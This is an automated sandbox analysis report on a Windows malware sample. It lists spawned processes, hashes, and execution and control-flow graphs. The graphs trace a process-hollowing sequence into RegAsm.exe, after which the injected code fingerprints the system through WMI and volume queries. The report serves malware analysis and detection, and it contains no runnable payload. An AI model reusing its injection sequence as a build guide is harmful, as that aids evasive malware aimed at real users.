                                      File size:2'141'552 bytes
                                      MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:3
                                      Start time:15:32:05
                                      Start date:12/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:15:32:05
                                      Start date:12/12/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4E1.tmp" "c:\Users\user\AppData\Local\Temp\qiobmurj\CSCE088865CA7FA428F90DCC973FB284B32.TMP"
                                      Imagebase:0x820000
                                      File size:46'832 bytes
                                      MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:5
                                      Start time:15:32:06
                                      Start date:12/12/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                      Imagebase:0x8e0000
                                      File size:65'440 bytes
                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                        Execution Graph

                                        Execution Coverage:18.7%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:114
                                        Total number of Limit Nodes:3
                                        execution_graph 2033 1802bf1 2035 1802bbe 2033->2035 2034 1802bc6 2034->2034 2035->2034 2063 1802810 2035->2063 2067 1802805 2035->2067 2036 1802c75 2044 1802edf 2036->2044 2061 18023f0 Wow64SetThreadContext 2036->2061 2062 18023e8 Wow64SetThreadContext 2036->2062 2037 1802cdf 2037->2044 2047 1802670 ReadProcessMemory 2037->2047 2048 1802678 ReadProcessMemory 2037->2048 2038 1802d24 2038->2044 2059 18024c1 VirtualAllocEx 2038->2059 2060 18024c8 VirtualAllocEx 2038->2060 2039 1802d87 2039->2044 2045 1802581 WriteProcessMemory 2039->2045 2046 1802588 WriteProcessMemory 2039->2046 2040 1802e57 2057 1802581 WriteProcessMemory 2040->2057 2058 1802588 WriteProcessMemory 2040->2058 2041 1802dae 2041->2040 2041->2044 2055 1802581 WriteProcessMemory 2041->2055 2056 1802588 WriteProcessMemory 2041->2056 2042 1802e80 2042->2044 2049 18023f0 Wow64SetThreadContext 2042->2049 2050 18023e8 Wow64SetThreadContext 2042->2050 2043 1802eca 2043->2044 2053 1802340 ResumeThread 2043->2053 2054 1802339 ResumeThread 2043->2054 2045->2041 2046->2041 2047->2038 2048->2038 2049->2043 2050->2043 2053->2044 2054->2044 2055->2041 2056->2041 2057->2042 2058->2042 2059->2039 2060->2039 2061->2037 2062->2037 2064 1802899 CreateProcessA 2063->2064 2066 1802a5b 2064->2066 2068 1802810 CreateProcessA 2067->2068 2070 1802a5b 2068->2070 2071 1802b88 2073 1802b98 2071->2073 2072 1802bc6 2072->2072 2073->2072 2085 1802810 CreateProcessA 2073->2085 2086 1802805 CreateProcessA 2073->2086 2074 1802c75 2082 1802edf 2074->2082 2101 18023f0 2074->2101 2105 18023e8 2074->2105 2075 1802cdf 2075->2082 2109 1802670 2075->2109 2113 1802678 2075->2113 2076 1802d24 2076->2082 2117 18024c1 2076->2117 2121 18024c8 2076->2121 2077 1802d87 2077->2082 2125 1802588 2077->2125 2129 1802581 2077->2129 2078 1802e57 2091 1802581 WriteProcessMemory 2078->2091 2092 1802588 WriteProcessMemory 2078->2092 2079 1802dae 2079->2078 2079->2082 2089 1802581 WriteProcessMemory 2079->2089 2090 1802588 WriteProcessMemory 2079->2090 2080 1802e80 2080->2082 2083 18023f0 Wow64SetThreadContext 2080->2083 2084 18023e8 Wow64SetThreadContext 2080->2084 2081 1802eca 2081->2082 2133 1802340 2081->2133 2137 1802339 2081->2137 2083->2081 2084->2081 2085->2074 2086->2074 2089->2079 2090->2079 2091->2080 2092->2080 2102 1802435 Wow64SetThreadContext 2101->2102 2104 180247d 2102->2104 2104->2075 2106 18023f0 Wow64SetThreadContext 2105->2106 2108 180247d 2106->2108 2108->2075 2110 1802678 ReadProcessMemory 2109->2110 2112 1802707 2110->2112 2112->2076 2114 18026c3 ReadProcessMemory 2113->2114 2116 1802707 2114->2116 2116->2076 2118 1802508 VirtualAllocEx 2117->2118 2120 1802545 2118->2120 2120->2077 2122 1802508 VirtualAllocEx 2121->2122 2124 1802545 2122->2124 2124->2077 2126 18025d0 WriteProcessMemory 2125->2126 2128 1802627 2126->2128 2128->2079 2130 18025d0 WriteProcessMemory 2129->2130 2132 1802627 2130->2132 2132->2079 2134 1802380 ResumeThread 2133->2134 2136 18023b1 2134->2136 2136->2082 2138 1802340 ResumeThread 2137->2138 2140 18023b1 2138->2140 2140->2082 2141 1802b98 2143 1802bbe 2141->2143 2142 1802bc6 2142->2142 2143->2142 2159 1802810 CreateProcessA 2143->2159 2160 1802805 CreateProcessA 2143->2160 2144 1802c75 2152 1802edf 2144->2152 2169 18023f0 Wow64SetThreadContext 2144->2169 2170 18023e8 Wow64SetThreadContext 2144->2170 2145 1802cdf 2145->2152 2155 1802670 ReadProcessMemory 2145->2155 2156 1802678 ReadProcessMemory 2145->2156 2146 1802d24 2146->2152 2167 18024c1 VirtualAllocEx 2146->2167 2168 18024c8 VirtualAllocEx 2146->2168 2147 1802d87 2147->2152 2153 1802581 WriteProcessMemory 2147->2153 2154 1802588 WriteProcessMemory 2147->2154 2148 1802e57 2165 1802581 WriteProcessMemory 2148->2165 2166 1802588 WriteProcessMemory 2148->2166 2149 1802dae 2149->2148 2149->2152 2163 1802581 WriteProcessMemory 2149->2163 2164 1802588 WriteProcessMemory 2149->2164 2150 1802e80 2150->2152 2157 18023f0 Wow64SetThreadContext 2150->2157 2158 18023e8 Wow64SetThreadContext 2150->2158 2151 1802eca 2151->2152 2161 1802340 ResumeThread 2151->2161 2162 1802339 ResumeThread 2151->2162 2153->2149 2154->2149 2155->2146 2156->2146 2157->2151 2158->2151 2159->2144 2160->2144 2161->2152 2162->2152 2163->2149 2164->2149 2165->2150 2166->2150 2167->2147 2168->2147 2169->2145 2170->2145

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 1802805-18028a5 3 18028a7-18028b1 0->3 4 18028de-18028fe 0->4 3->4 5 18028b3-18028b5 3->5 9 1802900-180290a 4->9 10 1802937-1802966 4->10 7 18028b7-18028c1 5->7 8 18028d8-18028db 5->8 11 18028c3 7->11 12 18028c5-18028d4 7->12 8->4 9->10 13 180290c-180290e 9->13 20 1802968-1802972 10->20 21 180299f-1802a59 CreateProcessA 10->21 11->12 12->12 14 18028d6 12->14 15 1802910-180291a 13->15 16 1802931-1802934 13->16 14->8 18 180291c 15->18 19 180291e-180292d 15->19 16->10 18->19 19->19 22 180292f 19->22 20->21 23 1802974-1802976 20->23 32 1802a62-1802ae8 21->32 33 1802a5b-1802a61 21->33 22->16 25 1802978-1802982 23->25 26 1802999-180299c 23->26 27 1802984 25->27 28 1802986-1802995 25->28 26->21 27->28 28->28 29 1802997 28->29 29->26 43 1802af8-1802afc 32->43 44 1802aea-1802aee 32->44 33->32 46 1802b0c-1802b10 43->46 47 1802afe-1802b02 43->47 44->43 45 1802af0-1802af3 call 1800b04 44->45 45->43 50 1802b20-1802b24 46->50 51 1802b12-1802b16 46->51 47->46 49 1802b04-1802b07 call 1800b04 47->49 49->46 54 1802b36-1802b3d 50->54 55 1802b26-1802b2c 50->55 51->50 53 1802b18-1802b1b call 1800b04 51->53 53->50 56 1802b54 54->56 57 1802b3f-1802b4e 54->57 55->54 60 1802b55 56->60 57->56 60->60
                                        APIs
                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01802A46
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: bc895abe7c9ba1daea7a49aa5e9fb5f1da995d119fa4071e14bff191e0eba96d
                                        • Instruction ID: 3c1c5e3e96f4c09288283080cd6dd274db1e5a991ae137be48fecbc10499772a
                                        • Opcode Fuzzy Hash: bc895abe7c9ba1daea7a49aa5e9fb5f1da995d119fa4071e14bff191e0eba96d
                                        • Instruction Fuzzy Hash: 03912871D00619CFEB65CF68CC45BADBBB2BF48314F148169E809E7280DBB49A85CB91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 61 1802810-18028a5 63 18028a7-18028b1 61->63 64 18028de-18028fe 61->64 63->64 65 18028b3-18028b5 63->65 69 1802900-180290a 64->69 70 1802937-1802966 64->70 67 18028b7-18028c1 65->67 68 18028d8-18028db 65->68 71 18028c3 67->71 72 18028c5-18028d4 67->72 68->64 69->70 73 180290c-180290e 69->73 80 1802968-1802972 70->80 81 180299f-1802a59 CreateProcessA 70->81 71->72 72->72 74 18028d6 72->74 75 1802910-180291a 73->75 76 1802931-1802934 73->76 74->68 78 180291c 75->78 79 180291e-180292d 75->79 76->70 78->79 79->79 82 180292f 79->82 80->81 83 1802974-1802976 80->83 92 1802a62-1802ae8 81->92 93 1802a5b-1802a61 81->93 82->76 85 1802978-1802982 83->85 86 1802999-180299c 83->86 87 1802984 85->87 88 1802986-1802995 85->88 86->81 87->88 88->88 89 1802997 88->89 89->86 103 1802af8-1802afc 92->103 104 1802aea-1802aee 92->104 93->92 106 1802b0c-1802b10 103->106 107 1802afe-1802b02 103->107 104->103 105 1802af0-1802af3 call 1800b04 104->105 105->103 110 1802b20-1802b24 106->110 111 1802b12-1802b16 106->111 107->106 109 1802b04-1802b07 call 1800b04 107->109 109->106 114 1802b36-1802b3d 110->114 115 1802b26-1802b2c 110->115 111->110 113 1802b18-1802b1b call 1800b04 111->113 113->110 116 1802b54 114->116 117 1802b3f-1802b4e 114->117 115->114 120 1802b55 116->120 117->116 120->120
                                        APIs
                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01802A46
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: fb048deb2f28cba5fc987704ca4d05f311dffbe32b48c4a8bdce7d33f7a08a3d
                                        • Instruction ID: 55f93f056e6eddd17e672bc0f3d9971a46f9bf79222b538f1977e554d2efc7df
                                        • Opcode Fuzzy Hash: fb048deb2f28cba5fc987704ca4d05f311dffbe32b48c4a8bdce7d33f7a08a3d
                                        • Instruction Fuzzy Hash: A0913871D006198FEB65CF68CC45BADBBB2BF48314F148169E809E7280DBB49A85CF91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 121 1802581-18025d6 123 18025e6-1802625 WriteProcessMemory 121->123 124 18025d8-18025e4 121->124 126 1802627-180262d 123->126 127 180262e-180265e 123->127 124->123 126->127
                                        APIs
                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01802618
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 79756ed883d70ff6d56a7e2246a40700ccb66d4e73e542fe2c58563b3d012627
                                        • Instruction ID: bf93293c1a05855b8a19b261e809ddd19e792ff9ab58b7ad45b784f34f86dfab
                                        • Opcode Fuzzy Hash: 79756ed883d70ff6d56a7e2246a40700ccb66d4e73e542fe2c58563b3d012627
                                        • Instruction Fuzzy Hash: D72127B59003499FDF10CFA9C985BEEBBF5FF48310F14842AE919A7250D7789A54CBA0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 131 1802588-18025d6 133 18025e6-1802625 WriteProcessMemory 131->133 134 18025d8-18025e4 131->134 136 1802627-180262d 133->136 137 180262e-180265e 133->137 134->133 136->137
                                        APIs
                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01802618
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: ed022d2b08c157fb835e167cb265522bc264942fd4563a7e2dd2bc6de3f1ca49
                                        • Instruction ID: 3d19dd2ab50d7c07660e3c0acffb06cfac3c7e21739ff6ca146b11f2822c62f0
                                        • Opcode Fuzzy Hash: ed022d2b08c157fb835e167cb265522bc264942fd4563a7e2dd2bc6de3f1ca49
                                        • Instruction Fuzzy Hash: D12107B59003499FDB10DFA9C985BEEBBF5FF48310F108429E919A7240D779A944CBA4

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 141 1802670-1802705 ReadProcessMemory 145 1802707-180270d 141->145 146 180270e-180273e 141->146 145->146
                                        APIs
                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 018026F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 4e992bde617bb65b2ecac4bd6fb92798cc0309e3e8baada4fcb9f38bfc830b52
                                        • Instruction ID: 227db682f3d366239451448eef43d248f028030c3a02ed553b74fcea884ee15f
                                        • Opcode Fuzzy Hash: 4e992bde617bb65b2ecac4bd6fb92798cc0309e3e8baada4fcb9f38bfc830b52
                                        • Instruction Fuzzy Hash: 742128B18002499FDB10DFAAC885AEEFBF5FF48310F108429E519A7240D778A945DBA4

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 150 18023e8-180243b 153 180244b-180247b Wow64SetThreadContext 150->153 154 180243d-1802449 150->154 156 1802484-18024b4 153->156 157 180247d-1802483 153->157 154->153 157->156
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0180246E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 7b04e91c32d662eabf93eb3da82c5bcf7a03052a7a384b8e877ce1cf46913798
                                        • Instruction ID: 708fb76988b393d1348129cb0d8f157c2e7b67fcd5d1628d6985f61ef417ba06
                                        • Opcode Fuzzy Hash: 7b04e91c32d662eabf93eb3da82c5bcf7a03052a7a384b8e877ce1cf46913798
                                        • Instruction Fuzzy Hash: 262138B1D002098FDB10DFAAC8857EEBBF5FF48314F148429D559A7240DB78AA45CFA1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 161 18023f0-180243b 163 180244b-180247b Wow64SetThreadContext 161->163 164 180243d-1802449 161->164 166 1802484-18024b4 163->166 167 180247d-1802483 163->167 164->163 167->166
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0180246E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: dbbd4791535cd5b14bf6e8480ea82824d38626b2997ef405946e0461e2f34068
                                        • Instruction ID: 78632fe41f1c3486b3cb807f900920b9c28b91de12e554cd1936c238e83cd109
                                        • Opcode Fuzzy Hash: dbbd4791535cd5b14bf6e8480ea82824d38626b2997ef405946e0461e2f34068
                                        • Instruction Fuzzy Hash: CA2138B1D002098FDB10DFAAC4857EEBBF5EF48314F108429D559A7240CB78A945CFA1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 171 1802678-1802705 ReadProcessMemory 174 1802707-180270d 171->174 175 180270e-180273e 171->175 174->175
                                        APIs
                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 018026F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: a174e62f8692971bc73af594e7b976fee92401615efd667363aead4bb767ccca
                                        • Instruction ID: 27914c1b3d3c8e3df72f40af873e9878dda7e7d222124161f3117f58fe1036db
                                        • Opcode Fuzzy Hash: a174e62f8692971bc73af594e7b976fee92401615efd667363aead4bb767ccca
                                        • Instruction Fuzzy Hash: 342137B1C003499FDB10DFAAC885AEEFBF5FF48310F10842AE519A7240C778A944CBA0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 179 18024c1-1802543 VirtualAllocEx 182 1802545-180254b 179->182 183 180254c-1802571 179->183 182->183
                                        APIs
                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01802536
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: ff760f67f4dd328a503d7213c4430346ba3a41d260ce31026f8571d353d33396
                                        • Instruction ID: 6104ad7fdd97801a7f28e2c70d4fb61dd11b156a1910877fc107be035a759f1b
                                        • Opcode Fuzzy Hash: ff760f67f4dd328a503d7213c4430346ba3a41d260ce31026f8571d353d33396
                                        • Instruction Fuzzy Hash: 471156728002498FCB20DFA9C949BEEBFF6FF88310F14841AE519A7250C7799654CFA0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 187 18024c8-1802543 VirtualAllocEx 190 1802545-180254b 187->190 191 180254c-1802571 187->191 190->191
                                        APIs
                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01802536
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: cfcf61d157d26ad49d97d086d785964474b211510cfbebe16e3811520e630ca0
                                        • Instruction ID: 740cf73be7e27bbea264c15f16ce1033c378a70b50f8799ff7859a8d8cda834e
                                        • Opcode Fuzzy Hash: cfcf61d157d26ad49d97d086d785964474b211510cfbebe16e3811520e630ca0
                                        • Instruction Fuzzy Hash: EE1137729002499FDB10DFAAC845AEEFFF5FF88310F108419E519A7250C779A544CFA0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 195 1802339-18023af ResumeThread 199 18023b1-18023b7 195->199 200 18023b8-18023dd 195->200 199->200
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: c13e4177967389a177e4a9b0cd484ac45475b60f5c4d3f637ee0c468fe2fa6de
                                        • Instruction ID: c352f76e0d245e4910018122ef242a72eef3f6d2d58756bf9401d04ec6670bc0
                                        • Opcode Fuzzy Hash: c13e4177967389a177e4a9b0cd484ac45475b60f5c4d3f637ee0c468fe2fa6de
                                        • Instruction Fuzzy Hash: 4A113AB1D003488FDB24DFAAC8457EEFBF5EF88314F248419D519A7250CB79A544CBA0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 204 1802340-18023af ResumeThread 207 18023b1-18023b7 204->207 208 18023b8-18023dd 204->208 207->208
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 8cea6f62f6eabb0571f1bead6f15e28ec259123386613710c4efd68d8076bc6a
                                        • Instruction ID: 2343bdc38d3c3edffd6d976da4d71c2e45e7e139dda18f68ae7c8f6177d424ce
                                        • Opcode Fuzzy Hash: 8cea6f62f6eabb0571f1bead6f15e28ec259123386613710c4efd68d8076bc6a
                                        • Instruction Fuzzy Hash: F6113AB1D003488FDB24DFAAC8457EEFBF5EF88314F208419D519A7250CB79A544CBA0

                                        Execution Graph

                                        Execution Coverage:2.9%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:57.6%
                                        Total number of Nodes:59
                                        Total number of Limit Nodes:5
                                        execution_graph 13676 4087f0 13678 4087fc 13676->13678 13677 408979 ExitProcess 13678->13677 13679 408811 GetCurrentProcessId GetCurrentThreadId 13678->13679 13680 408974 13678->13680 13682 408851 GetForegroundWindow 13679->13682 13683 40884b 13679->13683 13689 43b400 13680->13689 13684 4088d8 13682->13684 13683->13682 13684->13680 13688 40cdf0 CoInitializeEx 13684->13688 13692 43ca40 13689->13692 13691 43b405 FreeLibrary 13691->13677 13693 43ca49 13692->13693 13693->13691 13643 43b781 13645 43b822 13643->13645 13644 43bace 13645->13644 13647 43b480 LdrInitializeThunk 13645->13647 13647->13644 13694 43bf91 13696 43bef0 13694->13696 13695 43bff7 13696->13695 13699 43b480 LdrInitializeThunk 13696->13699 13698 43c01d 13699->13698 13648 43b720 GetForegroundWindow 13652 43d320 13648->13652 13650 43b72e GetForegroundWindow 13651 43b74e 13650->13651 13653 43d330 13652->13653 13653->13650 13659 40ce23 CoInitializeSecurity 13660 40d2c5 CoUninitialize 13661 40e062 13660->13661 13700 40ce55 13701 40ce70 13700->13701 13701->13701 13704 436f90 13701->13704 13703 40ceb9 13705 436fc0 CoCreateInstance 13704->13705 13707 437181 SysAllocString 13705->13707 13708 437526 13705->13708 13711 4371fe 13707->13711 13709 437536 GetVolumeInformationW 13708->13709 13720 437558 13709->13720 13712 437516 SysFreeString 13711->13712 13713 437206 CoSetProxyBlanket 13711->13713 13712->13708 13714 437226 SysAllocString 13713->13714 13715 43750c 13713->13715 13717 4372f0 13714->13717 13715->13712 13717->13717 13718 437315 SysAllocString 13717->13718 13722 43733c 13718->13722 13719 4374fa SysFreeString SysFreeString 13719->13715 13720->13703 13721 4374f0 13721->13719 13722->13719 13722->13721 13723 437380 VariantInit 13722->13723 13725 4373d0 13723->13725 13724 4374df VariantClear 13724->13721 13725->13724 13662 43bc65 13663 43bc90 13662->13663 13666 43bcde 13663->13666 13669 43b480 LdrInitializeThunk 13663->13669 13664 43bd6f 13666->13664 13670 43b480 LdrInitializeThunk 13666->13670 13668 43bde7 13669->13666 13670->13668

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 436f90-436fb8 1 436fc0-437006 0->1 1->1 2 437008-43701f 1->2 3 437020-43705b 2->3 3->3 4 43705d-43709a 3->4 5 4370a0-4370b2 4->5 5->5 6 4370b4-4370cd 5->6 8 4370d7-4370e2 6->8 9 4370cf 6->9 10 4370f0-437122 8->10 9->8 10->10 11 437124-43717b CoCreateInstance 10->11 12 437181-4371b2 11->12 13 437526-437556 call 43ce00 GetVolumeInformationW 11->13 15 4371c0-4371d4 12->15 18 437560-437562 13->18 19 437558-43755c 13->19 15->15 17 4371d6-437200 SysAllocString 15->17 24 437516-437522 SysFreeString 17->24 25 437206-437220 CoSetProxyBlanket 17->25 20 437587-43758e 18->20 19->18 22 437590-437597 20->22 23 4375a7-4375bf 20->23 22->23 26 437599-4375a5 22->26 27 4375c0-4375d4 23->27 24->13 28 437226-43723a 25->28 29 43750c-437512 25->29 26->23 27->27 31 4375d6-43760f 27->31 30 437240-437261 28->30 29->24 30->30 32 437263-4372e3 SysAllocString 30->32 33 437610-437650 31->33 34 4372f0-437313 32->34 33->33 35 437652-43767f call 41dc20 33->35 34->34 36 437315-43733e SysAllocString 34->36 39 437680-437688 35->39 42 437344-437366 36->42 43 4374fa-43750a SysFreeString * 2 36->43 39->39 41 43768a-43768c 39->41 44 437692-4376a2 call 408070 41->44 45 437570-437581 41->45 50 4374f0-4374f6 42->50 51 43736c-43736f 42->51 43->29 44->45 45->20 47 4376a7-4376ae 45->47 50->43 51->50 52 437375-43737a 51->52 52->50 53 437380-4373c8 VariantInit 52->53 54 4373d0-4373e4 53->54 54->54 55 4373e6-4373f4 54->55 56 4373f8-4373fa 55->56 57 437400-437406 56->57 58 4374df-4374ec VariantClear 56->58 57->58 59 43740c-43741a 57->59 58->50 60 437467 59->60 61 43741c-437421 59->61 63 437469-4374a2 call 407ff0 call 408e90 60->63 62 437446-43744a 61->62 64 437430-437438 62->64 65 43744c-437455 62->65 74 4374a4 63->74 75 4374a9-4374b1 63->75 67 43743b-437444 64->67 68 437457-43745a 65->68 69 43745c-437460 65->69 67->62 67->63 68->67 69->67 71 437462-437465 69->71 71->67 74->75 76 4374b3 75->76 77 4374b8-4374db call 408020 call 408000 75->77 76->77 77->58
                                        APIs
                                        • CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C), ref: 00437173
                                        • SysAllocString.OLEAUT32(D080DE8F), ref: 004371DB
                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437218
                                        • SysAllocString.OLEAUT32(9F4F9D4B), ref: 00437268
                                        • SysAllocString.OLEAUT32(E8D216C6), ref: 0043731A
                                        • VariantInit.OLEAUT32(.'()), ref: 00437385
                                        • VariantClear.OLEAUT32(.'()), ref: 004374E0
                                        • SysFreeString.OLEAUT32(?), ref: 00437504
                                        • SysFreeString.OLEAUT32(?), ref: 0043750A
                                        • SysFreeString.OLEAUT32(00000000), ref: 00437517
                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00437552
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                        • String ID: !"$"#$%$.'()$.;$>C$C$p*v,${.] ${|
                                        • API String ID: 2573436264-264043890
                                        • Opcode ID: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
                                        • Instruction ID: 06fb3ad9466451430b31427f45de08a7eb0daa23bec53a4f5f9458ad790f981b
                                        • Opcode Fuzzy Hash: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
                                        • Instruction Fuzzy Hash: D302F0B1A083009FD320CF64CC81B5BBBE5EB99314F14982DF6C59B3A1D679E805CB96

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
